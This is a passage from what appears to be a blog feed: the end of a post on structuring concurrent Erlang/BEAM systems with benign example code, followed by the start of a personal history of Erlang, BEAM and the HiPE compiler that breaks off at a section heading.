&lt;h2 id=&quot;visualizing-processes-as-gnomes&quot; tabindex=&quot;-1&quot;&gt;Visualizing Processes as Gnomes&lt;/h2&gt;
&lt;p&gt;When designing concurrent systems on the BEAM, it can be helpful to personify processes to understand their roles and interactions better. One such visualization is to think of processes as gnomes or workers in a complex, bustling workshop. Each gnome has its tasks, knowledge (state), and means of communication, working independently yet contributing to the workshop&#39;s overall goals. This metaphor offers a tangible way to grasp BEAM&#39;s abstract concepts of process management, state, and communication.&lt;/p&gt;
&lt;p&gt;Imagine each gnome as an independent worker with a specific job. In the context of BEAM, these jobs are described in the code processes execute. Like gnomes, processes operate independently, holding their state in their &amp;quot;heads.&amp;quot; This state is private and unique to each process, mirroring how each gnome knows only what is in its head.&lt;/p&gt;
&lt;p&gt;Communication among gnomes is akin to asynchronous message passing in BEAM. They &amp;quot;talk&amp;quot; by sending messages to each other without expecting an immediate response, allowing them to continue their tasks without waiting. This method of communication increases the level of concurrency and efficiency in the system, ensuring that no single gnome or process becomes a bottleneck.&lt;/p&gt;
&lt;p&gt;Each gnome reads the instructions (code) and performs the described task. This step-by-step execution highlights the process&#39;s role as an executor of code, adhering to the earlier principle that processes are not the code itself but rather the entities that bring the code to life. Reading and executing instructions emphasizes the dynamic nature of process-based execution, where each process can handle diverse tasks depending on the code.
Just as gnomes might sometimes encounter difficulties or confusion in their tasks, processes in BEAM can also run into issues that hinder their execution. Here, the concept of supervision comes into play. Supervisors are akin to wise, overseeing gnomes who ensure that if any worker encounters a problem, the issue is addressed promptly - restarting the task, reassigning it, or taking corrective measures. This supervision mechanism is essential for building resilient systems that can recover from failures and continue operating smoothly.&lt;/p&gt;
&lt;p&gt;Visualizing processes as gnomes or workers enriches our understanding of concurrent systems on BEAM, making abstract concepts more relatable and easier to grasp. This metaphor helps developers and system architects envision architecture as a lively ecosystem of independent yet interconnected entities, each with its role, state, and means of communication. It underscores the importance of designing systems that are efficient, scalable, and robust enough to handle failures gracefully, ensuring uninterrupted operations.&lt;/p&gt;
&lt;p&gt;By embracing this visualization, we can approach system design with a clearer, more tangible perspective, fostering creativity and innovation in building and managing concurrent systems on the BEAM. It&#39;s a reminder that at the heart of every complex system, there are simple, fundamental principles guiding its operation - principles that, when understood and applied effectively, can lead to the creation of truly exceptional software. I expand on this metaphor in much more detail in the &lt;a href=&quot;https://happihacking.com/blog/posts/2025/the-gnome-village/&quot;&gt;Gnomes, Domains, and Flows&lt;/a&gt; series.&lt;/p&gt;
&lt;h2 id=&quot;think-about-tasks-when-dividing-responsibility&quot; tabindex=&quot;-1&quot;&gt;Think About Tasks when Dividing Responsibility&lt;/h2&gt;
&lt;p&gt;A fundamental aspect of designing concurrent systems on BEAM involves defining tasks and assigning responsibilities to processes. A clear, logical approach to task allocation enhances the system&#39;s efficiency and reliability. This section outlines a methodology for deciding process responsibility by focusing on task completion from start to finish, illustrating with examples for clarity.&lt;/p&gt;
&lt;p&gt;In BEAM, each process should be responsible for a specific task, ensuring it can be executed from inception to completion. This principle of dedicated responsibility simplifies system design, making it easier to debug, scale, and manage. It aligns with encapsulation, where each process, like a microservice, independently manages its state and behavior.&lt;/p&gt;
&lt;p&gt;Let&#39;s consider a real-world example to illustrate task allocation: a web application that handles user registration, data processing, and notifications. In this scenario:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;User Registration Process: This process handles everything related to registering a new user - from receiving the registration request to validating the data and storing the user&#39;s information in the database.&lt;/li&gt;
&lt;li&gt;Data Processing Process: Once a user is registered, a separate process might handle data processing tasks, such as analyzing user data for insights or preparing the data for other parts of the system.&lt;/li&gt;
&lt;li&gt;Notification Process: A distinct process could manage sending notifications to users, whether a welcome email post-registration or alerts based on user activity.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For larger, more complex tasks, dividing the task into subtasks executed by other processes ensures manageability and scalability. Consider a process responsible for handling a high-volume data analysis task. This process can delegate specific analytical tasks to subprocesses:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Main Data Analysis Process: Coordinates the overall task, receiving the initial request and returning the final report.&lt;/li&gt;
&lt;li&gt;Subprocesses for Analysis: Perform detailed analysis of parts of the data.&lt;/li&gt;
&lt;li&gt;Subprocess for Report Generation: Gathers results from all analyses and prepares a comprehensive report.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each subprocess is responsible for its task from start to finish, ensuring clear boundaries and simplifying the development and troubleshooting processes.&lt;/p&gt;
&lt;p&gt;The key is to ensure that one process is ultimately responsible for a task from start to finish. This does not preclude it from delegating parts of the task to other processes. It also implies that it coordinates the overall task, including initiating subprocesses and compiling their outcomes into a final result. This approach maximizes the benefits of BEAM&#39;s concurrency model, allowing for efficient parallel processing while maintaining order and accountability.&lt;/p&gt;
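The coordinator pattern above can be sketched as a simple scatter/gather. The work/1 function here is a stand-in for real per-chunk analysis, and summing results stands in for compiling the report:

```erlang
-module(gather).
-export([analyze/1]).

%% The main process delegates one chunk per subprocess, but
%% remains responsible for the task from start to finish.
analyze(Chunks) ->
    Parent = self(),
    Pids = lists:map(
        fun(Chunk) ->
            spawn(fun() -> Parent ! {self(), work(Chunk)} end)
        end,
        Chunks),
    collect(Pids, []).

%% Gather every subprocess result, then compile the final report.
collect([], Acc) ->
    lists:sum(Acc);
collect([Pid | Rest], Acc) ->
    receive
        {Pid, Result} -> collect(Rest, [Result | Acc])
    end.

%% Stand-in for the actual analysis of one chunk of data.
work(Chunk) ->
    lists:sum(Chunk).
```

Matching on each Pid in collect/2 keeps the coordinator accountable: it knows exactly which subtasks have completed and which are still outstanding.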
&lt;p&gt;Thinking of task allocation and process responsibility has several advantages. The system architecture becomes easier to understand and maintain by assigning clear responsibilities. Isolating tasks to specific processes improves the system&#39;s ability to recover from errors, as failures are contained within individual processes. It becomes easier to scale the system by adding more processes to handle the increased load or by optimizing individual processes for performance.&lt;/p&gt;
&lt;h2 id=&quot;structuring-systems-by-thinking-about-flow&quot; tabindex=&quot;-1&quot;&gt;Structuring Systems by Thinking About Flow&lt;/h2&gt;
&lt;p&gt;In concurrent system design, especially within the BEAM environment, an alternative approach to defining process responsibilities is conceptualizing the system in terms of flow. This method emphasizes the movement and transformation of data or tasks through the system, offering a dynamic perspective that complements the task-centric view. By focusing on flow, designers can identify natural divisions within the system, leading to a more intuitive distribution of processes that align with the system&#39;s operational logic.&lt;/p&gt;
&lt;p&gt;Flow refers to the sequence and interaction of operations within a system to achieve a specific outcome. It encompasses the path data takes from input to output, including all intermediate processing steps. Visualizing a system’s flow helps identify key points where processes can be introduced to handle specific workflow segments efficiently.&lt;/p&gt;
&lt;p&gt;Mapping out the flow shows how data or tasks move through the system, highlighting dependencies and potential bottlenecks. By examining the flow, developers can pinpoint logical points to introduce processes. These points often correspond to changes in data state, decision branches, or integration with external systems. Structuring systems around flow makes it easier to scale or modify parts of the system independently, as the impact on the overall workflow is clearer. Understanding the flow aids in tracing issues within the system, as it maps the path of data or tasks through various processes.&lt;/p&gt;
&lt;p&gt;To effectively implement a flow-based approach in BEAM systems, consider the following strategies:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Event-Driven Processes: Design processes that are triggered by specific events in the flow, ensuring that they are reactive and aligned with the system’s operational dynamics.&lt;/li&gt;
&lt;li&gt;Pipeline Architecture: Construct a pipeline where each process is a stage in the flow, receiving input, performing its operation, and passing the output to the next stage. This model is particularly effective for data processing and transformation tasks.&lt;/li&gt;
&lt;li&gt;State Management: For complex state management flows, consider using processes to encapsulate stateful operations, ensuring that state changes are localized and manageable.&lt;/li&gt;
&lt;li&gt;Flow Control Processes: Implement processes dedicated to controlling the flow, such as routing, load balancing, and error handling, to maintain smooth operation across the system.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Imagine a web application that processes user requests. The flow begins with receiving the request, validating it, processing it (e.g., querying a database), and finally responding to the user.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Request Receiver Process: Handles incoming requests, acting as the entry and exit point of the flow.&lt;/li&gt;
&lt;li&gt;Validator Process: Checks the validity of the request before further processing.&lt;/li&gt;
&lt;li&gt;Data Processor Process: Interacts with the database or performs the core logic based on the validated request.&lt;/li&gt;
&lt;li&gt;Response Process: Compiles the response and returns it to the receiver process.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each process represents a distinct stage in the flow, with clear responsibilities and interactions defined by the sequence of operations handling a web request.&lt;/p&gt;
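Such a flow can be sketched as a chain of stage processes, each applying its operation and forwarding the output to the next stage. The stages and their operations below are illustrative stand-ins for validation, processing, and response compilation:

```erlang
-module(pipeline).
-export([start/0, stage/2]).

%% Build the flow back-to-front so each stage knows only its successor.
start() ->
    Responder = spawn(?MODULE, stage, [fun(R) -> {reply, R} end, self()]),
    Processor = spawn(?MODULE, stage, [fun(Req) -> Req * 2 end, Responder]),
    Validator = spawn(?MODULE, stage,
                      [fun(Req) when is_integer(Req) -> Req end, Processor]),
    Validator ! 21,                       % a request enters the flow
    receive Result -> Result end.         % the response comes back out

%% A generic stage: apply this stage's operation, pass the output on.
stage(Op, Next) ->
    receive
        Input ->
            Next ! Op(Input),
            stage(Op, Next)
    end.
```

Because stages only communicate through messages, any stage can later be replaced, duplicated for load, or moved without the others noticing.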
&lt;p&gt;Thinking about flow offers a complementary perspective to task-based process division in BEAM systems, focusing on how data and tasks move and transform. This approach facilitates a clear, logical structure for concurrent systems, enhancing understandability, scalability, and maintainability. By aligning processes with the natural flow of operations, designers can create efficient, responsive systems that effectively leverage the concurrent capabilities of the BEAM environment.&lt;/p&gt;
&lt;h2 id=&quot;process-archetypes-in-beam-systems&quot; tabindex=&quot;-1&quot;&gt;Process Archetypes in BEAM Systems&lt;/h2&gt;
&lt;p&gt;When constructing a BEAM system, the design of processes can benefit from categorizing them into specific archetypes. These archetypes assist in organizing the processes according to their purpose and behavior and facilitate a more robust and maintainable system structure. Here are examples of process archetypes within BEAM systems:&lt;/p&gt;
&lt;h3 id=&quot;workers&quot; tabindex=&quot;-1&quot;&gt;Workers&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Pool Workers: These are processes designed to handle a queue of tasks, typically managed by a pool supervisor. They are ideal for tasks that can be executed in parallel, maximizing resource utilization.&lt;/li&gt;
&lt;li&gt;Short-lived Workers: These workers are used for one-off, transient tasks that do not require maintaining state after completing their job. They are often used for infrequent or minor tasks that do not justify the overhead of a pool of long-lived processes. To avoid garbage collection, spawn a worker process with a large enough heap for the task and let it die when it is done, immediately reclaiming all the memory.&lt;/li&gt;
&lt;li&gt;Servers: Long-lived workers like &lt;code&gt;gen_servers&lt;/code&gt; are designed to handle ongoing tasks and maintain state over time. They&#39;re the backbone of many systems, managing consistent state and providing services to other parts of the system.&lt;/li&gt;
&lt;/ul&gt;
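The pre-sized-heap trick for short-lived workers can be expressed with spawn_opt; the min_heap_size value below is an illustrative placeholder that you would size for the actual task:

```erlang
-module(oneoff).
-export([run/2]).

%% Run Fun(Arg) in a transient worker with a pre-sized heap, so the
%% worker never garbage-collects; when it exits, its whole heap is
%% reclaimed at once.
run(Fun, Arg) ->
    Parent = self(),
    {Pid, Ref} = spawn_opt(
        fun() -> Parent ! {self(), Fun(Arg)} end,
        [monitor, {min_heap_size, 100000}]),   % in words; sized per task
    receive
        {Pid, Result} ->
            erlang:demonitor(Ref, [flush]),
            {ok, Result};
        {'DOWN', Ref, process, Pid, Reason} ->
            {error, Reason}
    end.
```

The monitor also turns a crashing worker into an ordinary {error, Reason} return instead of a lost result.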
&lt;h3 id=&quot;flow-control&quot; tabindex=&quot;-1&quot;&gt;Flow Control&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Synchronize / Lock: Processes that ensure only one worker can access a resource at a time, preventing race conditions.&lt;/li&gt;
&lt;li&gt;Serialize / Keep (priority) order: Processes designed to order tasks, which is critical in systems where the sequence of operations matters.&lt;/li&gt;
&lt;li&gt;Rate Limiter / Circuit Breaker: Processes that control the flow of tasks to prevent system overloads. They act as safeguards, limiting the traffic rate or shutting down parts of the system if they become unresponsive.&lt;/li&gt;
&lt;/ul&gt;
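A minimal sketch of the Synchronize / Lock archetype: one process owns the lock, grants it to one worker at a time, and queues the rest. The message protocol here is illustrative:

```erlang
-module(lock).
-export([start/0, acquire/1, release/1, loop/1]).

start() ->
    spawn(?MODULE, loop, [free]).

%% Block until the lock process grants us the resource.
acquire(Lock) ->
    Lock ! {acquire, self()},
    receive granted -> ok end.

release(Lock) ->
    Lock ! {release, self()},
    ok.

%% free: grant to the first requester. held: queue later requesters
%% and grant to the next one when the owner releases.
loop(free) ->
    receive
        {acquire, Pid} ->
            Pid ! granted,
            loop({held, Pid, queue:new()})
    end;
loop({held, Owner, Waiting}) ->
    receive
        {acquire, Pid} ->
            loop({held, Owner, queue:in(Pid, Waiting)});
        {release, Owner} ->
            case queue:out(Waiting) of
                {{value, Next}, Rest} ->
                    Next ! granted,
                    loop({held, Next, Rest});
                {empty, _} ->
                    loop(free)
            end
    end.
```

Because all requests funnel through one mailbox, mutual exclusion falls out of ordinary message ordering; no shared-memory locking is involved.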
&lt;h3 id=&quot;data-flow&quot; tabindex=&quot;-1&quot;&gt;Data Flow&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Keepers of State: Processes that maintain and manage state information, critical for both short-term and long-term state management.&lt;/li&gt;
&lt;li&gt;Resource Owner: Processes that exclusively own and manage specific resources, such as files or network connections.&lt;/li&gt;
&lt;li&gt;Connections, Listeners, and Monitors: Processes that handle incoming traffic, listen for requests, or monitor resources for changes.&lt;/li&gt;
&lt;li&gt;Forwarders, Routers, and Broadcasters: Processes that move data through the system, directing traffic to the appropriate destinations or distributing messages to multiple recipients.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;error-handling&quot; tabindex=&quot;-1&quot;&gt;Error Handling&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Supervisors: These processes are crucial for system resilience. They monitor worker processes and apply pre-defined strategies to handle failures, such as restarting the failed processes.&lt;/li&gt;
&lt;li&gt;Insulators: Processes that contain faults within a certain part of the system to prevent cascading failures. They can also act similarly to circuit breakers, isolating parts of the system that may cause broader system issues.&lt;/li&gt;
&lt;/ul&gt;
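In OTP, the supervisor archetype is expressed declaratively through restart flags and child specifications. A minimal sketch, where worker_gnome is a hypothetical child module assumed to export start_link/0:

```erlang
-module(shop_sup).
-behaviour(supervisor).
-export([start_link/0, init/1]).

start_link() ->
    supervisor:start_link({local, ?MODULE}, ?MODULE, []).

%% one_for_one: restart only the child that crashed.
init([]) ->
    SupFlags = #{strategy => one_for_one,
                 intensity => 3,    % give up after 3 restarts...
                 period => 10},     % ...within 10 seconds
    Children = [#{id => worker_gnome,
                  start => {worker_gnome, start_link, []},
                  restart => permanent,
                  type => worker}],
    {ok, {SupFlags, Children}}.
```

The supervisor itself contains no recovery logic; the restart strategy in the specification is the whole error-handling policy.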
&lt;p&gt;Designing BEAM processes according to these archetypes ensures that each process has a clear role and responsibility, essential for the system&#39;s maintainability and scalability. It also allows for a modular approach, where each process can be independently developed, tested, and optimized. I later refined these categories into five distinct &lt;a href=&quot;https://happihacking.com/blog/posts/2025/process_archetypes/&quot;&gt;process archetypes&lt;/a&gt; with a dedicated post for each role.&lt;/p&gt;
&lt;h2 id=&quot;structure-code-by-domains&quot; tabindex=&quot;-1&quot;&gt;Structure Code by Domains&lt;/h2&gt;
&lt;p&gt;In the final section of our exploration into BEAM system design, we turn our attention to code structure. A vital strategy for effectively organizing code is to align it with business domains. This approach breaks down the system into distinct areas of functionality that correspond with different aspects of the business operations they represent.&lt;/p&gt;
&lt;p&gt;Each domain should represent a core business function, providing a focus for the development efforts. Developers can create systems that mirror the business&#39;s real-world organization by aligning code structure with these domains.
Domains establish clear boundaries within the codebase. This separation ensures that changes in one domain do not have unintended effects on others, facilitating easier maintenance and scalability.&lt;/p&gt;
&lt;p&gt;Encapsulating domain-specific logic within its bounded context allows for a cleaner codebase. It also makes the system more adaptable to changes within that domain without affecting the core functionalities of other domains.&lt;/p&gt;
&lt;p&gt;Now that we have divided the system into domains, the next step is to construct it by integrating functions, modules, and applications.
Starting with a broad perspective and narrowing down to specifics, we can think of system design in three primary layers: applications, modules, and functions. This top-down approach helps outline the system&#39;s architecture from the macro to the micro level, ensuring that each component fits into the larger purpose and design.&lt;/p&gt;
&lt;p&gt;Applications are the most expansive layer, each representing a substantial domain within the system. They are composed of several modules and define the system&#39;s macro functionality. Applications should have a clearly identified role and an API that exposes the necessary functionalities. They&#39;re the frontline of the domain, providing the services and interactions that users and other systems interface with.&lt;/p&gt;
&lt;p&gt;Within applications, modules act as subdomains. They encapsulate a related set of functionalities and abstract the specifics away from the application layer. Modules are crucial for breaking down the application&#39;s complexity into manageable segments. A well-defined module has a consistent API, the only interface through which the rest of the application interacts with the module&#39;s internal functions.&lt;/p&gt;
&lt;p&gt;At the granular level are functions, the fundamental units of execution that perform specific, well-defined tasks. They are the building blocks within modules designed to accomplish a particular operation effectively and efficiently. The system&#39;s logic resides in functions, carrying out computations and data manipulations that drive the module&#39;s capabilities.&lt;/p&gt;
&lt;p&gt;Suppose some of your functions perform general work that is not specific to an application or domain. If they are used in several places, consider breaking them out into a library application. There is no need to do this prematurely; don’t start writing frameworks and libraries before you have seen the need for the functionality in several places. And don’t take the DRY (don’t repeat yourself) principle too far.&lt;/p&gt;
&lt;p&gt;In structuring the system, we start by defining the applications, which sets the stage for the system’s capabilities and boundaries. Each application is then broken down into modules, organizing the system&#39;s complexity into focused areas that manage specific aspects of the application&#39;s responsibilities. Within each module, functions are defined to perform the operations and tasks necessary to achieve the module’s objectives.&lt;/p&gt;
&lt;p&gt;By architecting a system this way, we ensure each layer serves its purpose within the context. The application layer sets the scope and provides the necessary interfaces, and the module layer organizes and delineates the domain&#39;s internal logic. The function layer carries out the precise operations required.&lt;/p&gt;
&lt;p&gt;APIs serve as contracts between different parts of the codebase. They should be designed with clarity, ensuring that they are both self-explanatory and robust against changes in implementation. APIs should follow consistent design principles throughout the system. This consistency aids in predictability and ease of use for developers interfacing with different system parts. APIs need comprehensive documentation that explains their purpose, usage, and the domain logic they encapsulate. This documentation is vital for maintaining domain integrity and understanding throughout the system.&lt;/p&gt;
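The module-as-subdomain idea can be illustrated with a tiny sketch: the export list is the contract, while internal helpers remain free to change without breaking callers. The module and function names are hypothetical:

```erlang
%% A subdomain module: charge/2 is the API the rest of the
%% system relies on; everything else is an implementation detail.
-module(billing).
-export([charge/2]).

charge(Customer, Amount) ->
    Invoice = make_invoice(Customer, Amount),
    {ok, Invoice}.

%% Internal helper - not exported, so it can be refactored freely.
make_invoice(Customer, Amount) ->
    #{customer => Customer, amount => Amount}.
```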
&lt;p&gt;When aligning code with business domains, developers should have a solid understanding of the business context to create domains that accurately reflect business needs. Domains are not static. As business needs evolve, so should the corresponding domains and their implementations. Domain structuring promotes collaboration between technical teams and business stakeholders, ensuring the system evolves in line with business objectives.
Structuring code by business domains provides a logical and maintainable organization within the codebase and aligns technical solutions with business strategy. This synergy between business and technology is crucial for creating systems that support and drive business objectives.&lt;/p&gt;
&lt;h2 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;To design concurrent systems on BEAM, it is crucial to comprehend and utilize its concurrency model. BEAM executes processes in complete isolation, and these processes communicate via message passing. This approach makes systems highly resilient to failure and makes their concurrency easy to manage. It&#39;s important to note that a process is not the code it executes. Instead, consider a process as a worker and the code as its instructions. When designing the process architecture, it&#39;s helpful to think about tasks, flows, and process archetypes. When structuring your code, it&#39;s beneficial to think in terms of domains. These practices will help you build more robust and maintainable systems.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Three Decades with Erlang</title>
    <link href="https://happihacking.com/blog/posts/2023/erlang-history/"/>
    <updated>2023-12-14T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/erlang-history/</id>
    <summary>A Personal Odyssey</summary>
    <content type="html">&lt;img class=&quot;img-blog center&quot; src=&quot;https://happihacking.com/images/30_Years_On_and_In_the_Beam.jpeg&quot; alt=&quot;I am speaking at Code BEAM America.&quot; title=&quot;I am speaking at Code BEAM America.&quot; /&gt;
&lt;h1 id=&quot;my-brief-history-with-erlang&quot; tabindex=&quot;-1&quot;&gt;My Brief History with Erlang&lt;/h1&gt;
&lt;p&gt;As 2024 approaches, I am closing in on nearly 30 years of Erlang programming. My journey with this language began in 1994, when Erlang itself was still in its early stages of evolution. Over these decades, I have seen the growth and transformation of Erlang, and its impact on the world of telecom and beyond. This experience has given me a unique perspective on the development of Erlang and its runtime system, ERTS.&lt;/p&gt;
&lt;h2 id=&quot;erlangs-genesis-engineering-modern-telecom&quot; tabindex=&quot;-1&quot;&gt;Erlang&#39;s Genesis: Engineering Modern Telecom&lt;/h2&gt;
&lt;p&gt;The Erlang Runtime System (ERTS) was born from Ericsson&#39;s need to create a robust and efficient telecommunications infrastructure. This runtime system was designed to handle the demanding and concurrent requirements of both mobile and fixed phone networks.&lt;/p&gt;
&lt;p&gt;The groundwork established by Joe Armstrong, Mike Williams, and Robert Virding, under Bjarne Däcker&#39;s mentorship, shaped the core principles and architecture of Erlang. They recognized the importance of independent concurrent processes for telecom applications. Their focus on concurrency from the beginning was a strategic decision that aligned perfectly with the parallel nature of telecommunication operations, where multiple tasks need to run simultaneously and independently.&lt;/p&gt;
&lt;p&gt;Unlike traditional systems, where concurrency often leads to complex issues like deadlocks and race conditions, BEAM&#39;s architecture allows each process to operate independently. This independence is key in ensuring that the failure of one process does not cascade into a system-wide failure.&lt;/p&gt;
&lt;p&gt;Another aspect of BEAM&#39;s design contributing to its robustness is its soft real-time capabilities. In telecom networks, &#39;soft real-time&#39; refers to the system&#39;s ability to process and respond to inputs within a reasonable timeframe. This is essential for services like voice calls or data transmission, where delays or interruptions can degrade the quality of service.&lt;/p&gt;
&lt;p&gt;BEAM also features a sophisticated error-handling mechanism. It allows individual processes to fail and restart without affecting the overall system. This approach, often called &amp;quot;let it crash,&amp;quot; is a radical departure from traditional error handling but proves highly effective in maintaining system integrity. By localizing failures and managing them effectively, BEAM ensures that the larger system continues to operate smoothly.&lt;/p&gt;
&lt;p&gt;Combining these features - efficient management of concurrency, soft real-time processing, and robust error handling - makes BEAM uniquely suited for the demands of global communication networks. It enables systems built on Erlang and running on BEAM to offer high availability and reliability. As such, BEAM supports a wide array of services, ranging from everyday communications to data transfers.&lt;/p&gt;
&lt;p&gt;&lt;a title=&quot;Tekniska museet, Public domain, via Wikimedia Commons&quot; href=&quot;https://commons.wikimedia.org/wiki/File:Telefontornet_1890.jpg&quot;&gt;&lt;img alt=&quot;Telefontornet 1890&quot; src=&quot;https://upload.wikimedia.org/wikipedia/commons/thumb/9/93/Telefontornet_1890.jpg/512px-Telefontornet_1890.jpg&quot; style=&quot;width: 100%; object-fit: contain;&quot; /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&quot;erlangs-early-years-foundations-and-evolution&quot; tabindex=&quot;-1&quot;&gt;Erlang&#39;s Early Years: Foundations and Evolution&lt;/h2&gt;
&lt;p&gt;But let&#39;s go back to the origins of Erlang and its developmental journey. The language and the name came sometime in 1986 and 1987.&lt;/p&gt;
&lt;p&gt;Initially, Erlang was implemented in Prolog, but this early version faced limitations, especially in terms of speed and efficiency. When Erlang started to get real users around 1989, these issues had to be addressed. This led to the development of JAM (Joe&#39;s Abstract Machine), which was heavily influenced by WAM, the virtual machine for Prolog. JAM represented a significant advancement in Erlang&#39;s development, laying the foundational groundwork for what would eventually evolve into BEAM.&lt;/p&gt;
&lt;p&gt;JAM overcame some of Erlang&#39;s initial performance challenges. However, as Erlang began to be used more extensively, the need for a more efficient and robust system became apparent. This led to the development of BEAM, starting in 1993 as a compiler to C. You can read more about this in &lt;a href=&quot;https://dl.acm.org/doi/abs/10.1145/1238844.1238850&quot;&gt;A history of Erlang&lt;/a&gt; by Joe Armstrong.&lt;/p&gt;
&lt;h2 id=&quot;beam-advancing-erlangs-core&quot; tabindex=&quot;-1&quot;&gt;BEAM: Advancing Erlang&#39;s Core&lt;/h2&gt;
&lt;p&gt;BEAM brought several improvements over JAM, focusing on speed of execution, with features such as
a threaded code dispatcher and the mapping of virtual machine registers to CPU registers.&lt;/p&gt;
&lt;p&gt;Thus, the evolution from Prolog-based Erlang to JAM, and subsequently to BEAM, illustrates a path of continuous refinement and adaptation. Each stage was driven by the changing needs of the systems Erlang aimed to support, with each new development building upon the strengths of its predecessors.
You can read more about how BEAM works in &lt;a href=&quot;https://happihacking.com/resources/the-beam-book/&quot;&gt;The BEAM Book&lt;/a&gt;.&lt;/p&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/beams.JPG&quot; alt=&quot;Beams of light and wood.&quot; title=&quot;Beams of light and wood.&quot; /&gt;
&lt;h2 id=&quot;hipe-pushing-erlangs-performance-envelope&quot; tabindex=&quot;-1&quot;&gt;HiPE: Pushing Erlang&#39;s Performance Envelope&lt;/h2&gt;
&lt;p&gt;My involvement in the evolution of Erlang&#39;s ecosystem began with my work on the Jericho compiler. This project was part of my master&#39;s thesis and aimed at improving the efficiency and execution speed of Erlang code. Jericho, a JIT native code compiler for Erlang, was written in C and translated JAM code into SPARC v9 assembler. This translation improved performance, addressing one of the key limitations of JAM.&lt;/p&gt;
&lt;p&gt;The pursuit of optimizing Erlang&#39;s performance further led to my doctoral research and the creation of the High-Performance Erlang (HiPE) group and compiler. Unlike Jericho, HiPE was written in Erlang and was designed to convert both JAM and BEAM bytecode into machine code. This capability was not limited to a single architecture; HiPE supported multiple architectures, including x86, SPARC, and ARM.&lt;/p&gt;
&lt;p&gt;The advancements brought by the HiPE group to ERTS were substantial. During this period, our focus extended to garbage collection strategies, exploring the effectiveness of approaches such as hybrid and common heaps for processes. We also pioneered a just-in-time compilation method, implemented on a per-function basis.&lt;/p&gt;
&lt;p&gt;I was fortunate to collaborate with a team of esteemed colleagues in the HiPE project, including Kostis Sagonas, Mikael Pettersson, Richard Carlsson, Tobias Lindahl, Per Gustafsson, and Jesper Wilhelmsson. This collaboration extended to working closely with the OTP team, where we fine-tuned inter-process communication, introduced binary searches for extensive pattern matching, and redesigned BEAM&#39;s tagging scheme for enhanced efficiency.&lt;/p&gt;
&lt;p&gt;The work of my colleagues in the HiPE team also led to notable contributions to the language and the virtual machine. These include the introduction of Core Erlang and EDoc, implementation of bit syntax, refinements in floating-point arithmetic, the addition of type specs, and the development of the Dialyzer for static code analysis. Each of these contributions played a crucial role in enhancing the robustness and efficiency of the BEAM ecosystem.&lt;/p&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/hipe_logo_medium.gif&quot; alt=&quot;The HiPE logo, also beaming.&quot; title=&quot;The HiPE logo, also beaming.&quot; /&gt;
&lt;h2 id=&quot;diversifying-with-scala-and-simics-broadening-horizons&quot; tabindex=&quot;-1&quot;&gt;Diversifying with Scala and Simics: Broadening Horizons&lt;/h2&gt;
&lt;p&gt;Before going into the next era of Erlang&#39;s development, I&#39;d like to highlight two significant chapters in my journey that predate this period: my involvement with Scala at EPFL (École Polytechnique Fédérale de Lausanne) from 2003 to 2004, and with Virtutech from 2004 to 2005. These experiences, while seemingly a detour from Erlang, broadened my perspective on programming languages and virtual machines.&lt;/p&gt;
&lt;p&gt;In 2003, I joined EPFL as a project manager for Scala, a language that was then in its nascent stages of development. Scala, designed to be a scalable and efficient language, aims to bridge the gap between object-oriented and functional programming paradigms. My role in this project was not just administrative; it was an opportunity to think about language design. It also gave me experience in the management of a complex software project.&lt;/p&gt;
&lt;p&gt;One of the most interesting aspects of Scala was its functional programming characteristics, some of which were inspired by Erlang. Erlang’s approach to concurrency, fault tolerance, and distributed computing offered valuable lessons relevant to Scala&#39;s development. My experience with Erlang provided me with insights that I could bring to the Scala project. It was a chance to see how concepts from Erlang could be adapted and applied in a different context and to a language with a distinct set of goals and design principles.&lt;/p&gt;
&lt;p&gt;My tenure at EPFL was a period of rich learning and cross-pollination of ideas. It was like being at a junction where the roads of Erlang and Scala intersected, allowing for an exchange of ideas that enriched both my understanding and the development of Scala. This experience underscored the value of exploring diverse programming paradigms and the importance of functional
programming in modern software development.&lt;/p&gt;
&lt;p&gt;Following my role in the Scala project at EPFL, I transitioned to Virtutech in 2004, working on virtual machine technology. At Virtutech, I worked on Simics, a high-performance virtual platform that simulates the hardware of different computer systems. Simics was a powerful tool for developers, allowing them to mimic the behavior of complex systems and test software in a controlled environment.&lt;/p&gt;
&lt;p&gt;My focus at Virtutech was on the performance optimization of Simics. This task involved deep dives into the intricacies of system architecture and the challenges of accurately simulating hardware behavior at high speeds. The experience honed my skills in understanding and improving system performance, a crucial aspect of virtual machine technology and the Erlang runtime system.&lt;/p&gt;
&lt;p&gt;Working on Simics gave me a unique perspective on the significance of performance in virtual systems. It was akin to fine-tuning a high-performance engine, where every adjustment and enhancement could significantly improve how the system operated. This knowledge proved invaluable in my subsequent endeavors with Erlang and BEAM.&lt;/p&gt;
&lt;p&gt;These experiences at EPFL and Virtutech shaped my approach to system design and optimization. They underscored the importance of a holistic understanding of software and hardware in creating efficient and robust systems. As I returned to the world of Erlang, the skills and insights gained from these roles enriched my contributions to the Erlang community, particularly in system performance and optimization.&lt;/p&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/lausanne.JPG&quot; alt=&quot;A view from my apartment in Lausanne.&quot; title=&quot;A view from my apartment in Lausanne.&quot; /&gt;
&lt;h2 id=&quot;erlangs-stabilization-era-consolidation-over-innovation&quot; tabindex=&quot;-1&quot;&gt;Erlang&#39;s Stabilization Era: Consolidation Over Innovation&lt;/h2&gt;
